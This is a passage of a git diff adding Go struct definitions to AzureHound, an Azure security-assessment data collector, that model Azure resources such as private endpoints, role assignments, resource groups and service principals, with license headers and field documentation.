regarding the privacy statement. +type PrivacyProfile struct { + // A valid smtp email address for the privacy statement contact. + // Not required. + ContactEmail string `json:"contactEmail,omitempty"` + + // The URL that directs to the company's privacy statement. + // A valid URL format that begins with http:// or https://. + // Maximum length is 255 characters. + // Not required. + StatementUrl string `json:"statementUrl,omitempty"` +} diff --git a/models/azure/private_endpoint.go b/models/azure/private_endpoint.go new file mode 100644 index 0000000..1f48810 --- /dev/null +++ b/models/azure/private_endpoint.go @@ -0,0 +1,23 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package azure + +type PrivateEndpoint struct { + // Full identifier of the private endpoint resource. + Id string `json:"id,omitempty"` +} diff --git a/models/azure/private_endpoint_connection.go b/models/azure/private_endpoint_connection.go new file mode 100644 index 0000000..83e31a4 --- /dev/null +++ b/models/azure/private_endpoint_connection.go @@ -0,0 +1,28 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package azure + +// Private endpoint connection item. +type PrivateEndpointConnection struct { + Entity + + Name string `json:"name,omitempty"` + Type string `json:"type,omitempty"` + + Properties PrivateEndpointConnectionProperties `json:"properties,omitempty"` +} diff --git a/models/azure/private_endpoint_connection_item.go b/models/azure/private_endpoint_connection_item.go new file mode 100644 index 0000000..7a74555 --- /dev/null +++ b/models/azure/private_endpoint_connection_item.go @@ -0,0 +1,29 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package azure + +// Private endpoint connection item. +type PrivateEndpointConnectionItem struct { + // Modified whenever there is a change in the state of private endpoint connection. + Etag string `json:"etag,omitempty"` + + // Id of private endpoint connection. + Id string `json:"id,omitempty"` + + Properties ConnectionItemProperties `json:"properties,omitempty"` +} diff --git a/models/azure/private_endpoint_connection_properties.go b/models/azure/private_endpoint_connection_properties.go new file mode 100644 index 0000000..7998174 --- /dev/null +++ b/models/azure/private_endpoint_connection_properties.go @@ -0,0 +1,31 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package azure + +// Private endpoint connection item. +type PrivateEndpointConnectionProperties struct { + GroupIds []string `json:"groupIds,omitempty"` + PrivateEndpoint Entity `json:"privateEndpoint,omitempty"` + PrivateLinkServiceConnectionState PrivateLinkServiceConnectionStateProperty `json:"privateLinkServiceConnectionState,omitempty"` +} + +type PrivateLinkServiceConnectionStateProperty struct { + ActionsRequired string `json:"actionsRequired,omitempty"` + Description string `json:"description,omitempty"` + Status string `json:"status,omitempty"` +} diff --git a/models/azure/private_endpoint_connection_resource.go b/models/azure/private_endpoint_connection_resource.go new file mode 100644 index 0000000..f883ab8 --- /dev/null +++ b/models/azure/private_endpoint_connection_resource.go @@ -0,0 +1,26 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package azure + +// Private endpoint connection item. +type PrivateEndpointConnectionResource struct { + Id string `json:"id,omitempty"` + Name string `json:"name,omitempty"` + Properties ConnectionItemProperties `json:"properties,omitempty"` + Type string `json:"type,omitempty"` +} diff --git a/models/azure/private_link_service_connection_state.go b/models/azure/private_link_service_connection_state.go new file mode 100644 index 0000000..419bd10 --- /dev/null +++ b/models/azure/private_link_service_connection_state.go @@ -0,0 +1,32 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package azure + +import "github.com/bloodhoundad/azurehound/v2/enums" + +// An object that represents the approval state of the private link connection. +type PrivateLinkServiceConnectionState struct { + // A message indicating if changes on the service provider require any updates on the consumer. + ActionsRequired string `json:"actionsRequired,omitempty"` + + // The reason for approval or rejection. + Description string `json:"description,omitempty"` + + // Indicates whether the connection has been approved, rejected or removed by the key vault owner. + Status enums.EndpointConnectionStatus `json:"status,omitempty"` +} diff --git a/models/azure/provisioned_plan.go b/models/azure/provisioned_plan.go new file mode 100644 index 0000000..c16b43e --- /dev/null +++ b/models/azure/provisioned_plan.go @@ -0,0 +1,29 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package azure + +type ProvisionedPlan struct { + // For example, “Enabled”. + CapabilityStatus string `json:"capabilityStatus,omitempty"` + + // For example, “Success”. + ProvisioningStatus string `json:"provisioningStatus,omitempty"` + + // The name of the service; for example, “AccessControlS2S” + Service string `json:"service,omitempty"` +} diff --git a/models/azure/public_client_application.go b/models/azure/public_client_application.go new file mode 100644 index 0000000..71356d8 --- /dev/null +++ b/models/azure/public_client_application.go @@ -0,0 +1,26 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package azure + +// Specifies settings for non-web app or non-web API (for example, mobile or other public clients such as an installed +// application running on a desktop device). +type PublicClientApplication struct { + // Specifies the URLs where user tokens are sent for sign-in, or the redirect URIs where OAuth 2.0 authorization + // codes and access tokens are sent. + RedirectUris []string `json:"redirectUris,omitempty"` +} diff --git a/models/azure/push_settings.go b/models/azure/push_settings.go new file mode 100644 index 0000000..85a7dee --- /dev/null +++ b/models/azure/push_settings.go @@ -0,0 +1,33 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package azure + +type PushSettings struct { + Id string `json:"id,omitempty"` + Kind string `json:"kind,omitempty"` + Name string `json:"name,omitempty"` + Properties PushSettingsProperties `json:"properties,omitempty"` + Type string `json:"type,omitempty"` +} + +type PushSettingsProperties struct { + DynamicTagsJson string `json:"dynamicTagsJson,omitempty"` + IsPushEnabled bool `json:"isPushEnabled,omitempty"` + TagWhitelistJson string `json:"tagWhitelistJson,omitempty"` + TagsRequiringAuth string `json:"tagsRequiringAuth,omitempty"` +} diff --git a/models/azure/required_resource_access.go b/models/azure/required_resource_access.go new file mode 100644 index 0000000..1df51f4 --- /dev/null +++ b/models/azure/required_resource_access.go @@ -0,0 +1,45 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package azure + +import ( + "github.com/bloodhoundad/azurehound/v2/enums" + "github.com/gofrs/uuid" +) + +// Object used to specify an OAuth 2.0 permission scope or an app role that an application requires. +type ResourceAccess struct { + // The unique identifier for one of the OAuth2PermissionScopes or AppRole instances that the resource application + // exposes. + Id uuid.UUID `json:"id,omitempty"` + + // Specifies whether the {@link Id} property references an OAuth2PermissionScope or AppRole. + Type enums.AccessType `json:"type,omitempty"` +} + +// Specifies the set of OAuth 2.0 permission scopes and app roles under the specified resource that an application +// requires access to. The application may request the specified OAuth 2.0 permission scopes or app roles through the +// requiredResourceAccess property. +type RequiredResourceAccess struct { + // The list of OAuth2.0 permission scopes and app roles that the application requires from the specified resource. + ResourceAccess []ResourceAccess `json:"resourceAccess,omitempty"` + + // The unique identifier for the resource that the application requires access to. This should be equal to the + // {@link AppId} declared on the target resource application. + ResourceAppId string `json:"resourceAppId,omitempty"` +} diff --git a/models/azure/resource_group.go b/models/azure/resource_group.go new file mode 100644 index 0000000..3f73076 --- /dev/null +++ b/models/azure/resource_group.go @@ -0,0 +1,41 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package azure + +type ResourceGroup struct { + Entity + + // The location of the resource group. It cannot be changed after the resource group has been created. It must be + // one of the supported Azure locations. + Location string `json:"location,omitempty"` + + // The ID of the resource that manages this resource group. + ManagedBy string `json:"managedBy,omitempty"` + + // The name of the resource group. + Name string `json:"name,omitempty"` + + // The resource group properties. + Properties ResourceGroupProperties `json:"properties,omitempty"` + + // The tags attached to the resource group. + Tags map[string]string `json:"tags,omitempty"` + + // The type of the resource group. + Type string `json:"type,omitempty"` +} diff --git a/models/azure/resource_group_props.go b/models/azure/resource_group_props.go new file mode 100644 index 0000000..29c60f1 --- /dev/null +++ b/models/azure/resource_group_props.go @@ -0,0 +1,22 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package azure + +type ResourceGroupProperties struct { + ProvisioningState string `json:"provisioningState,omitempty"` +} diff --git a/models/azure/resource_reference.go b/models/azure/resource_reference.go new file mode 100644 index 0000000..28cbb17 --- /dev/null +++ b/models/azure/resource_reference.go @@ -0,0 +1,25 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package azure + +type ResourceReference struct { + Entity + + Name string `json:"name,omitempty"` + Type string `json:"type,omitempty"` +} diff --git a/models/azure/role.go b/models/azure/role.go new file mode 100644 index 0000000..30a25c1 --- /dev/null +++ b/models/azure/role.go @@ -0,0 +1,69 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package azure + +// A role definition is a collection of permissions in Azure Active Directory (Azure AD) listing the operations that can +// be performed and the resources against which they can performed. +type Role struct { + DirectoryObject + + // The description for the role. Read-only when isBuiltIn is true. + Description string `json:"description,omitempty"` + + // The display name for the role. + // + // Read-only when isBuiltIn is true + // Required + // Supports $filter (eq, in). + DisplayName string `json:"displayName,omitempty"` + + // Flag indicating whether the role definition is part of the default set included in + // Azure Active Directory (Azure AD) or a custom definition. + // + // Read-only + // Supports $filter (eq, in) + IsBuiltIn bool `json:"isBuiltIn,omitempty"` + + // Flag indicating whether the role is enabled for assignment. + // If false the role is not available for assignment. + // + // Read-only when isBuiltIn is true + IsEnabled bool `json:"isEnabled,omitempty"` + + // List of the scopes or permissions the role definition applies to. + // Currently only `/` is supported. + // + // Read-only when isBuiltIn is true + // Note: DO NOT USE. This will be deprecated soon. Attach scope to role assignment. + ResourceScopes []string `json:"resourceScopes,omitempty"` + + // List of permissions included in the role. + // + // Read-only when isBuiltIn is true + // Required + RolePermissions []RolePermission `json:"rolePermissions,omitempty"` + + // Custom template identifier that can be set when isBuiltIn is false but is read-only when isBuiltIn is true. + // This identifier is typically used if one needs an identifier to be the same across different directories. + TemplateId string `json:"templateId,omitempty"` + + // Indicates version of the role definition. + // + // Read-only when isBuiltIn is true + Version string `json:"version,omitempty"` +} diff --git a/models/azure/role_assignment.go b/models/azure/role_assignment.go new file mode 100644 index 0000000..07ea735 --- /dev/null +++ b/models/azure/role_assignment.go @@ -0,0 +1,47 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package azure + +type RoleAssignmentPropertiesWithScope struct { + // The principal ID. + PrincipalId string `json:"principalId,omitempty"` + + // The role definition ID. + RoleDefinitionId string `json:"roleDefinitionId,omitempty"` + + // The role assignment scope. + Scope string `json:"scope,omitempty"` +} + +type RoleAssignment struct { + // The role assignment ID. + Id string `json:"id,omitempty"` + + // The role assignment name. + Name string `json:"name,omitempty"` + + // The role assignment type. + Type string `json:"type,omitempty"` + + // Role assignment properties + Properties RoleAssignmentPropertiesWithScope `json:"properties,omitempty"` +} + +func (s RoleAssignment) GetPrincipalId() string { + return s.Properties.PrincipalId +} diff --git a/models/azure/role_permission.go b/models/azure/role_permission.go new file mode 100644 index 0000000..190059d --- /dev/null +++ b/models/azure/role_permission.go @@ -0,0 +1,35 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package azure + +// Represents a collection of allowed resource actions and the conditions that must be met for the action to be allowed. +// Resource actions are tasks that can be performed on a resource. For example, an application resource may support +// create, update, delete, and reset password actions. +type RolePermission struct { + // Set of tasks that can be performed on a resource. + // + // Required + AllowedResourceActions []string `json:"allowedResourceActions,omitempty"` + + // Optional constraints that must be met for the permission to be effective. + Condition string `json:"condition,omitempty"` + + // Set of tasks that may not be performed on a resource. + // Not yet supported by MS Graph API. + ExcludedResourceActions []string `json:"excludedResourceActions,omitempty"` +} diff --git a/models/azure/routing_preference.go b/models/azure/routing_preference.go new file mode 100644 index 0000000..622920a --- /dev/null +++ b/models/azure/routing_preference.go @@ -0,0 +1,26 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package azure + +import "github.com/bloodhoundad/azurehound/v2/enums" + +type RoutingPreference struct { + PublishInternetEndpoints bool `json:"publishInternetEndpoints,omitempty"` + PublishMicrosoftEndpoints bool `json:"publishMicrosoftEndpoints,omitempty"` + RoutingChoice enums.RoutingChoice `json:"routingChoice,omitempty"` +} diff --git a/models/azure/saml_sso_settings.go b/models/azure/saml_sso_settings.go new file mode 100644 index 0000000..94d54e0 --- /dev/null +++ b/models/azure/saml_sso_settings.go @@ -0,0 +1,24 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package azure + +// Represents a container for settings related to SAML single sign-on. +type SamlSingleSignOnSettings struct { + // The relative URI the service provider would redirect to after completion of the single sign-on flow. + RelayState string `json:"relayState,omitempty"` +} diff --git a/models/azure/sas_policy.go b/models/azure/sas_policy.go new file mode 100644 index 0000000..e40609b --- /dev/null +++ b/models/azure/sas_policy.go @@ -0,0 +1,25 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package azure + +type SasPolicy struct { + + //according to the documentation, this can only be the string "Log" + ExpirationAction string `json:"expirationAction,omitempty"` + SasExpirationPeriod string `json:"sasExpirationPeriod,omitempty"` +} diff --git a/models/azure/scheduled_events_profile.go b/models/azure/scheduled_events_profile.go new file mode 100644 index 0000000..e9f35f9 --- /dev/null +++ b/models/azure/scheduled_events_profile.go @@ -0,0 +1,23 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package azure + +type ScheduledEventsProfile struct { + // Specifies Terminate Scheduled Event related configurations. + TerminateNotificationProfile TerminateNotificationProfile `json:"terminateNotificationProfile,omitempty"` +} diff --git a/models/azure/security_profile.go b/models/azure/security_profile.go new file mode 100644 index 0000000..64e259d --- /dev/null +++ b/models/azure/security_profile.go @@ -0,0 +1,35 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package azure + +// Specifies the Security profile settings for the virtual machine or virtual machine scale set. +type SecurityProfile struct { + // This property can be used by user in the request to enable or disable the Host Encryption for the virtual machine + // or virtual machine scale set. This will enable the encryption for all the disks including Resource/Temp disk at + // host itself. + // Default: The Encryption at host will be disabled unless this property is set to true for the resource. + EncryptionAtHost bool `json:"encryptionAtHost,omitempty"` + + // Specifies the SecurityType of the virtual machine. It is set as TrustedLaunch to enable UefiSettings. + // Default: UefiSettings will not be enabled unless this property is set as TrustedLaunch. + SecurityType string `json:"securityType,omitempty"` + + // Specifies the security settings like secure boot and vTPM used while creating the virtual machine. + // Minimum api-version: 2020-12-01 + UefiSettings UefiSettings `json:"uefiSettings,omitempty"` +} diff --git a/models/azure/service_principal.go b/models/azure/service_principal.go new file mode 100644 index 0000000..5ba521b --- /dev/null +++ b/models/azure/service_principal.go @@ -0,0 +1,179 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package azure + +import ( + "github.com/bloodhoundad/azurehound/v2/enums" +) + +// Represents an instance of an application in a directory. +// For more detail see https://docs.microsoft.com/en-us/graph/api/resources/serviceprincipal?view=graph-rest-1.0 +type ServicePrincipal struct { + DirectoryObject + + // true if the service principal account is enabled; otherwise, false. + // Supports $filter (eq, ne, NOT, in). + AccountEnabled bool `json:"accountEnabled,omitempty"` + + // Defines custom behavior that a consuming service can use to call an app in specific contexts. + // For example, applications that can render file streams may set the addIns property for its "FileHandler" + // functionality. This will let services like Microsoft 365 call the application in the context of a document the + // user is working on. + AddIns []AddIn `json:"addIns,omitempty"` + + // Used to retrieve service principals by subscription, identify resource group and full resource ids for managed + // identities. + // Supports $filter (eq, NOT, ge, le, startsWith). + AlternativeNames []string `json:"alternativeNames,omitempty"` + + // The description exposed by the associated application. + AppDescription string `json:"appDescription,omitempty"` + + // The display name exposed by the associated application. + AppDisplayName string `json:"appDisplayName,omitempty"` + + // The unique identifier for the associated application (its appId property). + AppId string `json:"appId,omitempty"` + + // Unique identifier of the applicationTemplate that the servicePrincipal was created from. + // Read-only. + // Supports $filter (eq, ne, NOT, startsWith). + ApplicationTemplateId string `json:"applicationTemplateId,omitempty"` + + // Contains the tenant id where the application is registered. + // This is applicable only to service principals backed by applications. + // Supports $filter (eq, ne, NOT, ge, le). + AppOwnerOrganizationId string `json:"appOwnerOrganizationId,omitempty"` + + // Specifies whether users or other service principals need to be granted an app role assignment for this service + // principal before users can sign in or apps can get tokens. + // The default value is false. + // Not nullable. + // Supports $filter (eq, ne, NOT). + AppRoleAssignmentRequired bool `json:"appRoleAssignmentRequired,omitempty"` + + // The roles exposed by the application which this service principal represents. + // For more information see the appRoles property definition on the application entity. + // Not nullable. + AppRoles []AppRole `json:"appRoles,omitempty"` + + // The date and time the service principal was deleted. + // Read-only. + DeletedDateTime string `json:"deletedDateTime,omitempty"` + + // Free text field to provide an internal end-user facing description of the service principal. + // End-user portals such MyApps will display the application description in this field. + // The maximum allowed size is 1024 characters. + // Supports $filter (eq, ne, NOT, ge, le, startsWith) and $search. + Description string `json:"description,omitempty"` + + // Specifies whether Microsoft has disabled the registered application. + // Possible values are: null (default value), NotDisabled, and DisabledDueToViolationOfServicesAgreement + // (reasons may include suspicious, abusive, or malicious activity, or a violation of the Microsoft Services + // Agreement). + // Supports $filter (eq, ne, NOT). + DisabledByMicrosoftStatus string `json:"disabledByMicrosoftStatus,omitempty"` + + // The display name for the service principal. + // Supports $filter (eq, ne, NOT, ge, le, in, startsWith), $search, and $orderBy. + DisplayName string `json:"displayName,omitempty"` + + // Home page or landing page of the application. + Homepage string `json:"homepage,omitempty"` + + // Basic profile information of the acquired application such as app's marketing, support, terms of service and + // privacy statement URLs. The terms of service and privacy statement are surfaced to users through the user consent + // experience. + // Supports $filter (eq, ne, NOT, ge, le). + Info InformationalUrl `json:"info,omitempty"` + + // The collection of key credentials associated with the service principal. + // Not nullable. + // Supports $filter (eq, NOT, ge, le). + KeyCredentials []KeyCredential `json:"keyCredentials,omitempty"` + + // Specifies the URL where the service provider redirects the user to Azure AD to authenticate. + // Azure AD uses the URL to launch the application from Microsoft 365 or the Azure AD My Apps. When blank, Azure AD + // performs IDP-initiated sign-on for applications configured with SAML-based single sign-on. The user launches the + // application from Microsoft 365, the Azure AD My Apps, or the Azure AD SSO URL. + LoginUrl string `json:"loginUrl,omitempty"` + + // Specifies the URL that will be used by Microsoft's authorization service to logout an user using OpenId Connect + // front-channel, back-channel or SAML logout protocols. + LogoutUrl string `json:"logoutUrl,omitempty"` + + // Free text field to capture information about the service principal, typically used for operational purposes. + // Maximum allowed size is 1024 characters. + Notes string `json:"notes,omitempty"` + + // Specifies the list of email addresses where Azure AD sends a notification when the active certificate is near the + // expiration date. This is only for the certificates used to sign the SAML token issued for Azure AD Gallery + // applications. + NotificationEmailAddresses []string `json:"notificationEmailAddresses,omitempty"` + + // The delegated permissions exposed by the application. + OAuth2PermissionScopes []PermissionScope `json:"oauth2PermissionScopes,omitempty"` + + // The collection of password credentials associated with the application. + // Not nullable. + PasswordCredentials []PasswordCredential `json:"passwordCredentials,omitempty"` + + // Specifies the single sign-on mode configured for this application. + // Azure AD uses the preferred single sign-on mode to launch the application from Microsoft 365 or the Azure AD My Apps. + // The supported values are password, saml, notSupported, and oidc. + PreferredSingleSignOnMode string `json:"preferredSingleSignOnMode,omitempty"` + + // The URLs that user tokens are sent to for sign in with the associated application, or the redirect URIs that + // OAuth 2.0 authorization codes and access tokens are sent to for the associated application. + // Not nullable. + ReplyUrls []string `json:"replyUrls,omitempty"` + + // The collection for settings related to saml single sign-on. + SamlSingleSignOnSettings SamlSingleSignOnSettings `json:"samlSingleSignOnSettings,omitempty"` + + // Contains the list of identifiersUris, copied over from the associated application. + // Additional values can be added to hybrid applications. + // These values can be used to identify the permissions exposed by this app within Azure AD. + // For example, Client apps can specify a resource URI which is based on the values of this property to acquire an + // access token, which is the URI returned in the “aud” claim. + // The any operator is required for filter expressions on multi-valued properties. + // Not nullable. + // Supports $filter (eq, NOT, ge, le, startsWith). + ServicePrincipalNames []string `json:"servicePrincipalNames,omitempty"` + + // Identifies whether the service principal represents an application, a managed identity, or a legacy application. + // This is set by Azure AD internally. + ServicePrincipalType enums.ServicePrincipalType `json:"servicePrincipalType,omitempty"` + + // Specifies the Microsoft accounts that are supported for the current application. + // Read-only. + SignInAudience enums.SigninAudience `json:"signInAudience,omitempty"` + + // Custom strings that can be used to categorize and identify the service principal. Not nullable. + // Supports $filter (eq, NOT, ge, le, startsWith). + Tags []string `json:"tags,omitempty"` + + // Specifies the keyId of a public key from the keyCredentials collection. + // When configured, Azure AD issues tokens for this application encrypted using the key specified by this property. + // The application code that receives the encrypted token must use the matching private key to decrypt the token + // before it can be used for the signed-in user. + TokenEncryptionKeyId string 